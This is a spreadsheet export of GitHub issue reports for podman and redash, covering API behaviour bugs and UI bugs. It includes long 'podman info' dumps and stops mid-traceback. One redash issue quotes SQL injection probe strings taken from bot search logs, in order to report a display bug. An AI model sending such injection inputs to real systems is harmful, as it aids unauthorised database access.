executable: /usr/bin/pasta package: passt-0^20241211.g09478d5-1.fc41.x86_64 version: | pasta 0^20241211.g09478d5-1.fc41.x86_64 Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: true path: /run/podman/podman.sock rootlessNetworkCmd: pasta security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.3.1-1.fc41.x86_64 version: |- slirp4netns version 1.3.1 commit: e5e368c4f5db6ae75c2fce786e31eef9da6bf236 libslirp: 4.8.0 SLIRP_CONFIG_VERSION_MAX: 5 libseccomp: 2.5.5 swapFree: 8589930496 swapTotal: 8589930496 uptime: 11h 16m 31.00s (Approximately 0.46 days) variant: "" plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io store: configFile: /usr/share/containers/storage.conf containerStore: number: 2 paused: 0 running: 2 stopped: 0 graphDriverName: overlay graphOptions: overlay.imagestore: /usr/lib/containers/storage overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphRootAllocated: 536854134784 graphRootUsed: 403665657856 graphStatus: Backing Filesystem: btrfs Native Overlay Diff: "false" Supports d_type: "true" Supports shifting: "true" Supports volatile: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 5 runRoot: /run/containers/storage transientStore: false volumePath: /var/lib/containers/storage/volumes version: APIVersion: 5.3.1 Built: 1732147200 BuiltTime: Thu Nov 21 01:00:00 2024 GitCommit: "" GoVersion: go1.23.3 Os: linux OsArch: linux/amd64 Version: 5.3.1   Podman in a container No  Privileged Or Rootless Privileged  Upstream Latest Release No  Additional environment details _No response_  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/25026</t>
  </si>
  <si>
    <t>podman-remote: create command is wrong</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description When checking the `CreateCommand` of a container created through the api we are getting some weird results.  Steps to reproduce the issue Steps to reproduce the issue 1. Create a container using the api (E.g. using Podman-Desktop) 2. Inspect the container Config.CreateCommand 3. assert command is wrong  Describe the results you received  $: podman inspect hello-container | jq .[0].Config.CreateCommand [ "podman", "system", "service", "--time=0" ]   Describe the results you expected Empty array or nil.  podman info output yaml host: arch: amd64 buildahVersion: 1.38.0 cgroupControllers: - cpu - io - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.12-3.fc41.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.12, commit: ' cpuUtilization: idlePercent: 94.31 systemPercent: 0.82 userPercent: 4.87 cpus: 16 databaseBackend: sqlite distribution: distribution: fedora variant: workstation version: "41" eventLogger: journald freeLocks: 2031 hostname: fedora idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 524288 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 524288 size: 65536 kernel: 6.12.8-200.fc41.x86_64 linkmode: dynamic logDriver: journald memFree: 19032514560 memTotal: 67107631104 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.13.1-1.fc41.x86_64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.13.1 package: netavark-1.13.1-1.fc41.x86_64 path: /usr/libexec/podman/netavark version: netavark 1.13.1 ociRuntime: name: crun package: crun-1.19.1-1.fc41.x86_64 path: /usr/bin/crun version: |- crun version 1.19.1 commit: 3e32a70c93f5aa5fea69b50256cca7fd4aa23c80 rundir: /run/user/1000/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt-0^20241211.g09478d5-1.fc41.x86_64 version: | pasta 0^20241211.g09478d5-1.fc41.x86_64 Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: true path: /run/user/1000/podman/podman.sock rootlessNetworkCmd: pasta security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: "" package: "" version: "" swapFree: 8589930496 swapTotal: 8589930496 uptime: 52h 2m 21.00s (Approximately 2.17 days) variant: "" plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io store: configFile: /home/axel7083/.config/containers/storage.conf containerStore: number: 10 paused: 0 running: 0 stopped: 10 graphDriverName: overlay graphOptions: {} graphRoot: /home/axel7083/.local/share/containers/storage graphRootAllocated: 1022505254912 graphRootUsed: 396294459392 graphStatus: Backing Filesystem: btrfs Native Overlay Diff: "true" Supports d_type: "true" Supports shifting: "false" Supports volatile: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 670 runRoot: /run/user/1000/containers transientStore: false volumePath: /home/axel7083/.local/share/containers/storage/volumes version: APIVersion: 5.3.1 Built: 1732147200 BuiltTime: Thu Nov 21 01:00:00 2024 GitCommit: "" GoVersion: go1.23.3 Os: linux OsArch: linux/amd64 Version: 5.3.1   Podman in a container No  Privileged Or Rootless None  Upstream Latest Release Yes  Additional environment details _No response_  Additional information Linked issues - https://github.com/containers/podman/issues/6649 - https://github.com/containers/podman/pull/6896</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/25851</t>
  </si>
  <si>
    <t>Podman socket doesn't output EXPOSED ports</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description The ports exposed of the containers are not returned by the podman socket (only the ones bind to the host) I'm using rootfull containers, I'm not sure if it's the same for rootless. I haven't been able to find another issue regarding this, so I'm not sure if this behavior is by design  Steps to reproduce the issue Steps to reproduce the issue:  $ sudo podman --version podman version 5.2.2 $ sudo podman run -d --name port-test -p 80:80 nginx:alpine $ sudo curl -s --unix-socket /run/podman/podman.sock http://localhost/containers/json?all=true | jq '.[] | select(.Names[] == "/port-test") | .Ports' [ { "PrivatePort": 80, "PublicPort": 80, "Type": "tcp" } ] $ sudo podman run -d --name expose-test --expose 80 nginx:alpine $ sudo curl -s --unix-socket /run/podman/podman.sock http://localhost/containers/json?all=true | jq '.[] | select(.Names[] == "/expose-test") | .Ports' []   Describe the results you received Exposed ports are not returned by the Podman socket []  Describe the results you expected Docker equivalent  $ sudo docker --version Docker version 27.3.1, build ce12230 $ sudo docker run -d --name port-test -p 80:80 nginx:alpine $ sudo curl -s --unix-socket /run/docker.sock http://localhost/containers/json?all=true | jq '.[] | select(.Names[] == "/port-test") | .Ports' [ { "IP": "0.0.0.0", "PrivatePort": 80, "PublicPort": 80, "Type": "tcp" }, ] $ sudo docker run -d --name expose-test --expose 80 nginx:alpine $ sudo curl -s --unix-socket /run/docker.sock http://localhost/containers/json?all=true | jq '.[] | select(.Names[] == "/expose-test") | .Ports' [ { "PrivatePort": 80, "Type": "tcp" }, ]   podman info output yaml host: arch: amd64 buildahVersion: 1.37.6 cgroupControllers: - cpuset - cpu - io - memory - hugetlb - pids - rdma - misc cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.12-1.el9.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.12, commit: eb379dceb7efebd9a9d6b3349a57424d83483065' cpuUtilization: idlePercent: 99.61 systemPercent: 0.2 userPercent: 0.19 cpus: 4 databaseBackend: sqlite distribution: distribution: almalinux version: "9.5" eventLogger: journald freeLocks: 2046 hostname: almalinux9 idMappings: gidmap: null uidmap: null kernel: 5.14.0-503.35.1.el9_5.x86_64 linkmode: dynamic logDriver: journald memFree: 7268474880 memTotal: 8037085184 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.12.2-1.el9_5.x86_64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.12.2 package: netavark-1.12.2-1.el9.x86_64 path: /usr/libexec/podman/netavark version: netavark 1.12.2 ociRuntime: name: crun package: crun-1.16.1-1.el9.x86_64 path: /usr/bin/crun version: |- crun version 1.16.1 commit: afa829ca0122bd5e1d67f1f38e6cc348027e3c32 rundir: /run/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +YAJL os: linux pasta: executable: /bin/pasta package: passt-0^20240806.gee36266-7.el9_5.x86_64 version: | pasta 0^20240806.gee36266-7.el9_5.x86_64 Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: true path: /run/podman/podman.sock rootlessNetworkCmd: pasta security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: false slirp4netns: executable: /bin/slirp4netns package: slirp4netns-1.3.1-1.el9.x86_64 version: |- slirp4netns version 1.3.1 commit: e5e368c4f5db6ae75c2fce786e31eef9da6bf236 libslirp: 4.4.0 SLIRP_CONFIG_VERSION_MAX: 3 libseccomp: 2.5.2 swapFree: 0 swapTotal: 0 uptime: 0h 54m 8.00s variant: "" plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.access.redhat.com - registry.redhat.io - docker.io store: configFile: /etc/containers/storage.conf containerStore: number: 2 paused: 0 running: 2 stopped: 0 graphDriverName: overlay graphOptions: overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphRootAllocated: 40352677888 graphRootUsed: 1982976000 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "false" Supports d_type: "true" Supports shifting: "false" Supports volatile: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 2 runRoot: /run/containers/storage transientStore: false volumePath: /var/lib/containers/storage/volumes version: APIVersion: 5.2.2 Built: 1743162783 BuiltTime: Fri Mar 28 11:53:03 2025 GitCommit: "" GoVersion: go1.22.9 (Red Hat 1.22.9-2.el9_5) Os: linux OsArch: linux/amd64 Version: 5.2.2   Podman in a container No  Privileged Or Rootless Privileged  Upstream Latest Release No  Additional environment details  $ cat /etc/*-release AlmaLinux release 9.5 (Teal Serval) NAME="AlmaLinux" VERSION="9.5 (Teal Serval)" ID="almalinux" ID_LIKE="rhel centos fedora" VERSION_ID="9.5" PLATFORM_ID="platform:el9" PRETTY_NAME="AlmaLinux 9.5 (Teal Serval)" ANSI_COLOR="0;34" LOGO="fedora-logo-icon" CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos" HOME_URL="https://almalinux.org/" DOCUMENTATION_URL="https://wiki.almalinux.org/" BUG_REPORT_URL="https://bugs.almalinux.org/" ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9" ALMALINUX_MANTISBT_PROJECT_VERSION="9.5" REDHAT_SUPPORT_PRODUCT="AlmaLinux" REDHAT_SUPPORT_PRODUCT_VERSION="9.5" SUPPORT_END=2032-06-01 AlmaLinux release 9.5 (Teal Serval) AlmaLinux release 9.5 (Teal Serval)   Additional information I'm using prometheus [docker_sd_config](https://prometheus.io/docs/prometheus/latest/configuration/configuration/#docker_sd_config) I want expose the containers metrics port, not bind it</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/25871</t>
  </si>
  <si>
    <t>Docker compat api image removal with force stops running containers</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description Using the docker compatibility api if an image is in use by a running container and is removed with the force option specified the container is stopped and removed. Whereas in docker, images with running containers results in an error. In docker, force only results in the removal of stopped containers. See: https://docs.docker.com/reference/api/engine/version/v1.48/#tag/Image/operation/ImageDelete Tested against the mac desktop 1.17.2 and podman 5.4.2 built on ubuntu  Steps to reproduce the issue Steps to reproduce the issue 1. Pull an image and get it's ID 2. Start a container from that image e.g. `docker run -d [the id] sleep 300` 3. Run `docker rmi --force [the image ID]` 4. See the container is gone The same can be achieved using the docker go client e.g.  cli, _ := client.NewClientWithOpts(client.FromEnv) _, err = cli.ImageRemove(ctx, "the image id", image.RemoveOptions{ Force: true, PruneChildren: true, })   Describe the results you received The running container is stopped and removed  Describe the results you expected An error to occur e.g. `Error response from daemon: conflict: unable to delete aded1e1a5b37 (cannot be forced) - image is being used by running container fe300816e647`  podman info output yaml Client: APIVersion: 5.4.2 BuildOrigin: brew Built: 1743601389 BuiltTime: Wed Apr 2 14:43:09 2025 GitCommit: "" GoVersion: go1.24.2 Os: darwin OsArch: darwin/arm64 Version: 5.4.2 host: arch: arm64 buildahVersion: 1.38.0 cgroupControllers: - cpuset - cpu - io - memory - pids - rdma - misc cgroupManager: systemd cgroupVersion: v2 conmon: package: conmon-2.1.12-2.fc40.aarch64 path: /usr/bin/conmon version: 'conmon version 2.1.12, commit: ' cpuUtilization: idlePercent: 98.28 systemPercent: 0.97 userPercent: 0.75 cpus: 6 databaseBackend: sqlite distribution: distribution: fedora variant: coreos version: "40" eventLogger: journald freeLocks: 2006 hostname: localhost.localdomain idMappings: gidmap: null uidmap: null kernel: 6.11.3-200.fc40.aarch64 linkmode: dynamic logDriver: journald memFree: 3115659264 memTotal: 3792564224 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.12.2-2.fc40.aarch64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.12.2 package: netavark-1.12.2-1.fc40.aarch64 path: /usr/libexec/podman/netavark version: netavark 1.12.2 ociRuntime: name: crun package: crun-1.17-1.fc40.aarch64 path: /usr/bin/crun version: |- crun version 1.17 commit: 000fa0d4eeed8938301f3bcf8206405315bc1017 rundir: /run/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt-0^20240906.g6b38f07-1.fc40.aarch64 version: | pasta 0^20240906.g6b38f07-1.fc40.aarch64-pasta Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: true path: unix:run/podman/podman.sock rootlessNetworkCmd: pasta security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: false seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: true serviceIsRemote: true slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns-1.2.2-2.fc40.aarch64 version: |- slirp4netns version 1.2.2 commit: 0ee2d87523e906518d34a6b423271e4826f71faf libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.5 swapFree: 0 swapTotal: 0 uptime: 0h 1m 44.00s variant: v8 plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - docker.io store: configFile: /usr/share/containers/storage.conf containerStore: number: 19 paused: 0 running: 0 stopped: 19 graphDriverName: overlay graphOptions: overlay.imagestore: /usr/lib/containers/storage overlay.mountopt: nodev,metacopy=on graphRoot: /var/lib/containers/storage graphRootAllocated: 99252940800 graphRootUsed: 54138920960 graphStatus: Backing Filesystem: xfs Native Overlay Diff: "false" Supports d_type: "true" Supports shifting: "true" Supports volatile: "true" Using metacopy: "true" imageCopyTmpDir: /var/tmp imageStore: number: 70 runRoot: /run/containers/storage transientStore: false volumePath: /var/lib/containers/storage/volumes version: APIVersion: 5.3.1 Built: 1732147200 BuiltTime: Thu Nov 21 00:00:00 2024 GitCommit: "" GoVersion: go1.22.7 Os: linux OsArch: linux/arm64 Version: 5.3.1   Podman in a container No  Privileged Or Rootless None  Upstream Latest Release Yes  Additional environment details N/A  Additional information It is important that the image ID is used for the removal of the image, and not its tag</t>
  </si>
  <si>
    <t>https://github.com/containers/podman/issues/25881</t>
  </si>
  <si>
    <t>Podman Restful API in rootless mode ignores ulimits</t>
  </si>
  <si>
    <t xml:space="preserve"> Issue Description Hello, when I use the podman in rootless mode, and want to specify ulimit for cpu through the rest api, the limit gets ignored. When I use `--ulimit cpu=10:10 ` in rootless mode on the CLI, the limit gets applied correctly. In rootful mode for rest api the ulimit gets applied. This leads me to believe the issue is connected with rootless and rest api.  Steps to reproduce the issue I am running ubuntu 24.04 and podman v 4.9.3. To see if it happens on latest podman, these steps are using podman in container, but the same behaviour is observed on my system with just rootless podman. This example shows failing use case:  podman run --privileged -u podman -it quay.io/podman/stable bash podman $LOGGING system service -t 0 tcp:0.0.0.0:8081 &amp; # you might need to hit enter for the cmd prompt to appear podman --url tcp://127.0.0.1:8081 image pull alpine curl -X POST "http://localhost:8081/containers/create?name=test" \ -H "Content-Type: application/json" \ -d '{ "Image": "alpine", "Name": "test", "Cmd": ["sh", "-c", "ulimit -Ht"], "HostConfig": { "Ulimits": [ { "Name": "cpu", "Soft": 1, "Hard": 2 } ] } }' podman --url tcp://127.0.0.1:8081 inspect test #"Ulimits": [],  As seen from the inspect command, Ulimits are empty. If I run this command instead of doing the http request `podman --url tcp://127.0.0.1:8081 run -it --ulimit cpu=1:2 alpine sh -c "ulimit -Ht"` or start the podman as root (ie. without `-u podman`) `podman run --privileged -it quay.io/podman/stable bash` and then do the http request, the ulimits are applied correctly  "Ulimits": [ { "Name": "RLIMIT_CPU", "Soft": 1, "Hard": 2 }   Describe the results you received Using rootless mode and rest api, the ulimits are not applied  Describe the results you expected Using rootless mode and rest api, the cpu limit should be applied the same way when passed on CLI `--ulimit `  podman info output yaml Output from my **local** podman with v4.9.3 host: arch: amd64 buildahVersion: 1.33.7 cgroupControllers: - cpu - memory - pids cgroupManager: systemd cgroupVersion: v2 conmon: package: Unknown path: /usr/local/libexec/podman/conmon version: 'conmon version 2.1.13, commit: 82de887596ed8ee6d9b2ee85e4f167f307bb569b' cpuUtilization: idlePercent: 99.87 systemPercent: 0.05 userPercent: 0.08 cpus: 4 databaseBackend: sqlite distribution: codename: noble distribution: ubuntu version: "24.04" eventLogger: journald freeLocks: 2030 hostname: server idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 100000 size: 65536 kernel: 6.11.0-1012-azure linkmode: dynamic logDriver: journald memFree: 11403198464 memTotal: 16713166848 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns_1.4.0-5_amd64 path: /usr/lib/podman/aardvark-dns version: aardvark-dns 1.4.0 package: netavark_1.4.0-4_amd64 path: /usr/lib/podman/netavark version: netavark 1.4.0 ociRuntime: name: crun package: crun_1.14.1-1_amd64 path: /usr/bin/crun version: |- crun version 1.14.1 commit: de537a7965bfbe9992e2cfae0baeb56a08128171 rundir: /run/user/1000/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt_0.0~git20240220.1e6f92b-1_amd64 version: | pasta unknown version Copyright Red Hat GNU General Public License, version 2 or later &lt;https://www.gnu.org/licenses/old-licenses/gpl-2.0.html&gt; This is free software: you are free to change and redistribute it. There is NO WARRANTY, to the extent permitted by law. remoteSocket: exists: false path: /run/user/1000/podman/podman.sock security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: /usr/bin/slirp4netns package: slirp4netns_1.2.1-1build2_amd64 version: |- slirp4netns version 1.2.1 commit: 09e31e92fa3d2a1d3ca261adaeb012c8d75a8194 libslirp: 4.7.0 SLIRP_CONFIG_VERSION_MAX: 4 libseccomp: 2.5.5 swapFree: 0 swapTotal: 0 uptime: 183h 57m 22.00s (Approximately 7.62 days) variant: "" plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: {} store: configFile: /home/jan/.config/containers/storage.conf containerStore: number: 10 paused: 0 running: 0 stopped: 10 graphDriverName: overlay graphOptions: {} graphRoot: /home/jan/.local/share/containers/storage graphRootAllocated: 30084825088 graphRootUsed: 7610572800 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "true" Supports d_type: "true" Supports shifting: "false" Supports volatile: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 2 runRoot: /run/user/1000/containers transientStore: false volumePath: /home/jan/.local/share/containers/storage/volumes version: APIVersion: 4.9.3 Built: 0 BuiltTime: Thu Jan 1 00:00:00 1970 GitCommit: "" GoVersion: go1.22.2 Os: linux OsArch: linux/amd64 Version: 4.9.3 podman info from **podman in container** host: arch: amd64 buildahVersion: 1.39.4 cgroupControllers: - cpu - memory - pids cgroupManager: cgroupfs cgroupVersion: v2 conmon: package: conmon-2.1.13-1.fc41.x86_64 path: /usr/bin/conmon version: 'conmon version 2.1.13, commit: ' cpuUtilization: idlePercent: 99.87 systemPercent: 0.06 userPercent: 0.08 cpus: 4 databaseBackend: sqlite distribution: distribution: fedora variant: container version: "41" eventLogger: file freeLocks: 2048 hostname: 001ec30a88b2 idMappings: gidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 1 size: 999 - container_id: 1000 host_id: 1001 size: 64535 uidmap: - container_id: 0 host_id: 1000 size: 1 - container_id: 1 host_id: 1 size: 999 - container_id: 1000 host_id: 1001 size: 64535 kernel: 6.11.0-1012-azure linkmode: dynamic logDriver: k8s-file memFree: 11347324928 memTotal: 16713166848 networkBackend: netavark networkBackendInfo: backend: netavark dns: package: aardvark-dns-1.14.0-1.fc41.x86_64 path: /usr/libexec/podman/aardvark-dns version: aardvark-dns 1.14.0 package: netavark-1.14.1-1.fc41.x86_64 path: /usr/libexec/podman/netavark version: netavark 1.14.1 ociRuntime: name: crun package: crun-1.21-1.fc41.x86_64 path: /usr/bin/crun version: |- crun version 1.21 commit: 10269840aa07fb7e6b7e1acff6198692d8ff5c88 rundir: /tmp/storage-run-1000/crun spec: 1.0.0 +SYSTEMD +SELINUX +APPARMOR +CAP +SECCOMP +EBPF +CRIU +LIBKRUN +WASM:wasmedge +YAJL os: linux pasta: executable: /usr/bin/pasta package: passt-0^20250320.g32f6212-2.fc41.x86_64 version: "" remoteSocket: exists: true path: /tmp/storage-run-1000/podman/podman.sock rootlessNetworkCmd: pasta security: apparmorEnabled: false capabilities: CAP_CHOWN,CAP_DAC_OVERRIDE,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_NET_BIND_SERVICE,CAP_SETFCAP,CAP_SETGID,CAP_SETPCAP,CAP_SETUID,CAP_SYS_CHROOT rootless: true seccompEnabled: true seccompProfilePath: /usr/share/containers/seccomp.json selinuxEnabled: false serviceIsRemote: false slirp4netns: executable: "" package: "" version: "" swapFree: 0 swapTotal: 0 uptime: 188h 5m 28.00s (Approximately 7.83 days) variant: "" plugins: authorization: null log: - k8s-file - none - passthrough - journald network: - bridge - macvlan - ipvlan volume: - local registries: search: - registry.fedoraproject.org - registry.access.redhat.com - docker.io store: configFile: /home/podman/.config/containers/storage.conf containerStore: number: 0 paused: 0 running: 0 stopped: 0 graphDriverName: overlay graphOptions: {} graphRoot: /home/podman/.local/share/containers/storage graphRootAllocated: 30084825088 graphRootUsed: 7633362944 graphStatus: Backing Filesystem: extfs Native Overlay Diff: "true" Supports d_type: "true" Supports shifting: "false" Supports volatile: "true" Using metacopy: "false" imageCopyTmpDir: /var/tmp imageStore: number: 0 runRoot: /tmp/storage-run-1000/containers transientStore: false volumePath: /home/podman/.local/share/containers/storage/volumes version: APIVersion: 5.4.2 BuildOrigin: Fedora Project Built: 1743552000 BuiltTime: Wed Apr 2 00:00:00 2025 GitCommit: be85287fcf4590961614ee37be65eeb315e5d9ff GoVersion: go1.23.7 Os: linux OsArch: linux/amd64 Version: 5.4.2   Podman in a container Yes  Privileged Or Rootless Rootless  Upstream Latest Release Yes  Additional environment details This happens both on my local machine and Azure portal VM running ubuntu 24.04. On my machines, I have podman version 4.9.2. The reproduction is using stable podman image with podman v5.4.2  Additional information _No response_</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/275</t>
  </si>
  <si>
    <t>show login failure message?</t>
  </si>
  <si>
    <t>how about display a message when login failed? in current version the pages only reload when then login failed</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/277</t>
  </si>
  <si>
    <t>make the data source name unique</t>
  </si>
  <si>
    <t>I found that I can add multiple datasource with a same name. Maybe we should make this field unique.</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/303</t>
  </si>
  <si>
    <t>"Show Total" duplicates values on multiple runs</t>
  </si>
  <si>
    <t>To Reproduce: - Take any graph - Select show total. - Select show total again. - Notice how the numbers multiply (it seems like it's summing the total together with the series). - Repeat until infinity and profit. ;-)</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/417</t>
  </si>
  <si>
    <t>Fix: Integer columns are formatted as floats (with .00)</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/443</t>
  </si>
  <si>
    <t>When searching schemas by name you cannot see the columns</t>
  </si>
  <si>
    <t>1. choose any schema from the right list in "new query", click and you see the columns 2. now, write the schema name in the search box 3. try clicking on the schema name, the column names don't appear</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/541</t>
  </si>
  <si>
    <t>Cannot delete dashboard from home page</t>
  </si>
  <si>
    <t>On the home page, clicking the "X" next to a dashboard brings up the "are you sure" alert, but clicking OK results in the dashboard not being deleted. The title disappears, but if you reload the page the dashboard is still there. Version 0.7.1+b1015</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/655</t>
  </si>
  <si>
    <t>crash when adding an empty query to a dashboard</t>
  </si>
  <si>
    <t>1. Create a new, empty query. Name it and save 2. Create a new dashboard, add the empty query 3. Reload, see the errors on the JS console</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/669</t>
  </si>
  <si>
    <t>User can't save query without query text</t>
  </si>
  <si>
    <t>(seems like it doesn't pass the `data_source_id`)</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/755</t>
  </si>
  <si>
    <t>Results containing opening bracket (&lt;) are not displayed</t>
  </si>
  <si>
    <t>I have this query: SELECT keywords from recent_searches; Some of these contain HTML tags or quotes. Like so (output from postgres console):  keywords   10916&lt;/cite&gt;&lt;span 11576&lt;/cite&gt;&lt;span 12739&lt;/cite&gt;&lt;span 1506'-'1 21666&lt;/cite&gt;&lt;span 29002&lt;/cite&gt;&lt;span 30328&lt;/cite&gt;&lt;span 32710&lt;/cite&gt;&lt;span 44035&lt;/cite&gt;&lt;span 04289+and+1=(select+0)--+- 04289+and+1=(select+1)--+- 62244&lt;/cite&gt;&lt;span 93201&lt;/cite&gt;&lt;span (ok markdown chokes a bit on that I'm not sure how to convey it better) In the Redash query results, the "keywords" field shows up as blank for those items (which were search log entries from bots trying to perform SQL injection attacks). Every item listed above shows up as blank. Which is better than breaking something, but if that data can be escaped cleanly and displayed it would be an improvement.</t>
  </si>
  <si>
    <t>https://github.com/getredash/redash/issues/783</t>
  </si>
  <si>
    <t>AttributeError: 'datetime.timedelta' object has no attribute 'isoformat'</t>
  </si>
  <si>
    <t xml:space="preserve">On the latest 0.9.2-rc:  [2016-01-21 14:30:36,838: ERROR/MainProcess] Task redash.tasks.execute_query[766d3f9f-68a6-4a64-8cd9-b7e4e18bf2af] raised unexpected: AttributeError("'datetime.timedelta' object has no attribute 'isoformat'",) Traceback (most recent call last): File "/usr/local/lib/python2.7/dist-packages/celery/app/trace.py", line 240, in trace_task R = retval = fun(*args, **kwargs) File "/opt/redash/redash/tasks.py", line 31, in __call__ return super(BaseTask, self).__call__(*args, **kwargs) File "/usr/local/lib/python2.7/dist-packages/celery/app/trace.py", line 437, in __protected_call__ return self.run(*args, **kwargs) File "/opt/redash/redash/tasks.py", line 286, in execute_query data, error = query_runner.run_query(annotated_query) File "/opt/redash/redash/query_runner/pg.py", line 132, in run_query json_data = json.dumps(data, cls=JSONEncoder) File "/usr/lib/python2.7/json/__init__.py", line 250, in dumps sort_keys=sort_keys, **kw).encode(obj) File "/usr/lib/python2.7/json/encoder.py", line 207, 